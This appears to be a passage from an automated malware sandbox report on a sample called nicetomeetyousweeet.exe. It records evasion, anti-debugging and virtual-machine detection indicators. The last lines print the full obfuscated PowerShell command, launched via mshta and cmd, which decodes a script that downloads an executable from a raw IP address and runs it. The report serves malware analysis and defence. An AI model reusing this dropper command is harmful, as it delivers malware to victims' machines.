                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0040E54F Sleep,ExitProcess,6_2_0040E54F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0078E7B6 Sleep,ExitProcess,6_2_0078E7B6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,6_2_004198C2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,6_2_00799B29
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6818Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2632Jump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeWindow / User API: threadDelayed 5779Jump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeWindow / User API: threadDelayed 4163Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.dllJump to dropped file
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeAPI coverage: 5.5 %
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep count: 6818 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep count: 2632 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe TID: 4228Thread sleep count: 5779 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe TID: 4228Thread sleep time: -17337000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe TID: 4228Thread sleep count: 4163 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe TID: 4228Thread sleep time: -12489000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040B335
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0041B42F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040B53A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_004089A9
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00406AC2 FindFirstFileW,FindNextFileW,6_2_00406AC2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00407A8C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00418C69
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_00408DA7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0078900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_2_0078900E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0078B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0078B59C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0079B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0079B696
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00787CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00787CF3
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00786D29 FindFirstFileW,FindNextFileW,6_2_00786D29
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00798ED0 FindFirstFileW,6_2_00798ED0
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00406F06
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: Amcache.hve.9.drBinary or memory string: VMware
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: mshta.exe, 00000000.00000003.1712558385.000000000709B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: powershell.exe, 00000003.00000002.1824736094.0000000007DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: nicetomeetyousweeet.exe, 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: mshta.exe, 00000000.00000003.1712558385.000000000709B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: powershell.exe, 00000003.00000002.1814970381.000000000294E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: powershell.exe, 00000003.00000002.1824736094.0000000007DD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx?e
                Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeAPI call chain: ExitProcess graph end nodegraph_6-85760
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0043A65D
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041BCE3
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00442554 mov eax, dword ptr fs:[00000030h]6_2_00442554
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_005B0083 push dword ptr fs:[00000030h]6_2_005B0083
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007C27BB mov eax, dword ptr fs:[00000030h]6_2_007C27BB
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0078092B mov eax, dword ptr fs:[00000030h]6_2_0078092B
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00780D90 mov eax, dword ptr fs:[00000030h]6_2_00780D90
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0044E92E GetProcessHeap,6_2_0044E92E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00434168
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0043A65D
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00433B44
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00433CD7 SetUnhandledExceptionFilter,6_2_00433CD7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007B43CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_007B43CF
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007BA8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_007BA8C4
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007B3DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_007B3DAB
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe6_2_00410F36
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00418754 mouse_event,6_2_00418754
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe "C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jhjiqvp5bkw1ug1uicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurklvrzueugicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrfzkluavrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vti5kbewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietidutvvmpvyuxllhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbwwwzjlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbma0zht09rclbiuix1aw50icagicagicagicagicagicagicagicagicagicagicagifdzee9urlffzxassw50uhryicagicagicagicagicagicagicagicagicagicagicagiefowfepoycgicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicagimlsrfn1iiagicagicagicagicagicagicagicagicagicagicagicattmfnzxnqywnficagicagicagicagicagicagicagicagicagicagicagie5st0nzicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjhjiqvp5bkw1ug1uojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc5lje2ni83ns9ly29tzs5leguilcikrw52okfquerbvefcbmljzxrvbwvldhlvdxn3zwvldc5leguildasmck7u1rbulqtu2xfrxaomyk7au52b0tflwvyufjlu1njb24gicagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxuawnldg9tzwv0ew91c3dlzwv0lmv4zsi='+[char]0x22+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jhjiqvp5bkw1ug1uicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurklvrzueugicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrfzkluavrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vti5kbewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietidutvvmpvyuxllhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbwwwzjlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbma0zht09rclbiuix1aw50icagicagicagicagicagicagicagicagicagicagicagifdzee9urlffzxassw50uhryicagicagicagicagicagicagicagicagicagicagicagiefowfepoycgicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicagimlsrfn1iiagicagicagicagicagicagicagicagicagicagicagicattmfnzxnqywnficagicagicagicagicagicagicagicagicagicagicagie5st0nzicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjhjiqvp5bkw1ug1uojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc5lje2ni83ns9ly29tzs5leguilcikrw52okfquerbvefcbmljzxrvbwvldhlvdxn3zwvldc5leguildasmck7u1rbulqtu2xfrxaomyk7au52b0tflwvyufjlu1njb24gicagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxuawnldg9tzwv0ew91c3dlzwv0lmv4zsi='+[char]0x22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jhjiqvp5bkw1ug1uicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurklvrzueugicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlumrfzkluavrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vti5kbewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietidutvvmpvyuxllhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbwwwzjlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbma0zht09rclbiuix1aw50icagicagicagicagicagicagicagicagicagicagicagifdzee9urlffzxassw50uhryicagicagicagicagicagicagicagicagicagicagicagiefowfepoycgicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicagimlsrfn1iiagicagicagicagicagicagicagicagicagicagicagicattmfnzxnqywnficagicagicagicagicagicagicagicagicagicagicagie5st0nzicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjhjiqvp5bkw1ug1uojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc5lje2ni83ns9ly29tzs5leguilcikrw52okfquerbvefcbmljzxrvbwvldhlvdxn3zwvldc5leguildasmck7u1rbulqtu2xfrxaomyk7au52b0tflwvyufjlu1njb24gicagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxuawnldg9tzwv0ew91c3dlzwv0lmv4zsi='+[char]0x22+'))')))"Jump to behavior
